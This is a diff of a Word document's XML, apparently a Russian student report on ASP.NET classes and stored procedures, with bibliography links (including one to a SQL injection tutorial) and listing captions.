+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>professorweb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ru</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>my</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ASP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>base</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>level</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>6/6_3.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>EvilSQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> : http://www.evilsql.com/main/index.php/. -URL: http://www.evilsql.com/main/page1.php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>SQL Injection: http://www.w3schools.com/. -2010. -URL:  http://www.w3schools.com/sql/sql_injection.asp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -17352,8 +18354,8 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="28" w:name="_Toc420429542"/>
-      <w:bookmarkStart w:id="29" w:name="_Toc420429742"/>
+      <w:bookmarkStart w:id="28" w:name="_Toc420429742"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc420429542"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="24"/>
@@ -17375,29 +18377,65 @@
         </w:rPr>
         <w:t>1</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="28"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Абстрактный</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>базовый</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>класс</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="29"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Абстрактный базовый класс</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="28"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -19923,8 +20961,8 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="30" w:name="_Toc420429543"/>
-      <w:bookmarkStart w:id="31" w:name="_Toc420429743"/>
+      <w:bookmarkStart w:id="30" w:name="_Toc420429743"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc420429543"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="24"/>
@@ -19933,25 +20971,25 @@
         <w:lastRenderedPageBreak/>
         <w:t>Листинг 2</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="30"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Класс - наследник с параметризованными методами</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="31"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Класс - наследник с параметризованными методами</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -24825,6 +25863,7 @@
         <w:rPr>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="32" w:name="_Toc420429544"/>
@@ -24835,6 +25874,7 @@
         <w:rPr>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -24844,6 +25884,7 @@
         <w:rPr>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="33" w:name="_Toc420429744"/>
@@ -28225,140 +29266,178 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="34" w:name="_Toc420429545"/>
-      <w:bookmarkStart w:id="35" w:name="_Toc420429745"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
+      <w:bookmarkStart w:id="34" w:name="_Toc420429745"/>
+      <w:bookmarkStart w:id="35" w:name="_Toc420429545"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Листинг</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> 4</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="34"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Методы</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>реализованные</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>через</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>хранимые</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>процедуры</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>класса</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>наследника</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="35"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Методы</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>реализованные</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>через</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>хранимые</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>процедуры</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>класса</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>наследника</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="34"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
@@ -28383,6 +29462,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -28403,7 +29483,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">public class </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -30333,6 +31412,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">        public override void </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -30568,324 +31648,369 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:t xml:space="preserve">        }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
